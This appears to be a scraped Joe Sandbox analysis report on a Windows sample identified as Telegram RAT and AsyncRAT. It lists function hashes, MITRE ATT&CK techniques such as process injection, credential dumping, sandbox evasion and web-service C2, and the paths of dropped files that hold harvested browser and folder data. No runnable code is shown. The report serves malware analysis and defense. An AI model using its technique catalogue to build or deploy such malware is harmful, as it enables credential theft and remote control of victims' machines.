Instruction Fuzzy Hash: B7C1E7B04817478ED73ACF25EC481997BB2BFA5724B714A19D3616B2D0EBB8144ACF48

Function 00F69750 Relevance: .1, Instructions: 83COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4766348217.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_eEo6DAcnnx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 91fa746bfca4e4d2e0f0b0700d5cabadaf6daa1a0572f8c18360b8b98ae21f2a
Instruction ID: d68ad0b821fcc82787506a4da970883b8c04b4c1b39693c082cb756edb4834ee
Opcode Fuzzy Hash: 91fa746bfca4e4d2e0f0b0700d5cabadaf6daa1a0572f8c18360b8b98ae21f2a
Instruction Fuzzy Hash: 1B3106709056898FE749CF6AAC0078ABFE3BBC9304F06C17EC4089B375EB756506AB40

Function 00F69760 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4766348217.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_eEo6DAcnnx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 59dad861e850f87c9aa5a34dca6d8b890d1eb9f92220d2807a2f9fccce7077f9
Instruction ID: 887258c124de057192437049fd8f8d0fb0db49a3e910f8c7c8944dafc64e8dcd
Opcode Fuzzy Hash: 59dad861e850f87c9aa5a34dca6d8b890d1eb9f92220d2807a2f9fccce7077f9
Instruction Fuzzy Hash: AD31E571A056499BE708DF6BAC00B8ABBE3BBC9304F06C169C4089B374EB756506AB41

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as `CopyFromScreen` , `xwd` , or `screencapture` .
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report eEo6DAcnnx.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Telegram RAT

Threatname: AsyncRAT

Yara Signatures

Initial Sample

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Stealing of Sensitive Information

Snort Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\28838bfb6c25185a48ff280c1efeaebf\msgid.dat

C:\Users\user\AppData\Local\45932bff64d05104b91545939f748c0e\user@715575_en-CH\Browsers\Firefox\Bookmarks.txt

C:\Users\user\AppData\Local\45932bff64d05104b91545939f748c0e\user@715575_en-CH\Directories\Desktop.txt

C:\Users\user\AppData\Local\45932bff64d05104b91545939f748c0e\user@715575_en-CH\Directories\Documents.txt

C:\Users\user\AppData\Local\45932bff64d05104b91545939f748c0e\user@715575_en-CH\Directories\Downloads.txt

C:\Users\user\AppData\Local\45932bff64d05104b91545939f748c0e\user@715575_en-CH\Directories\OneDrive.txt

C:\Users\user\AppData\Local\45932bff64d05104b91545939f748c0e\user@715575_en-CH\Directories\Pictures.txt

C:\Users\user\AppData\Local\45932bff64d05104b91545939f748c0e\user@715575_en-CH\Directories\Startup.txt

C:\Users\user\AppData\Local\45932bff64d05104b91545939f748c0e\user@715575_en-CH\Directories\Temp.txt

Windows Analysis Report
eEo6DAcnnx.exe

Description:	Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre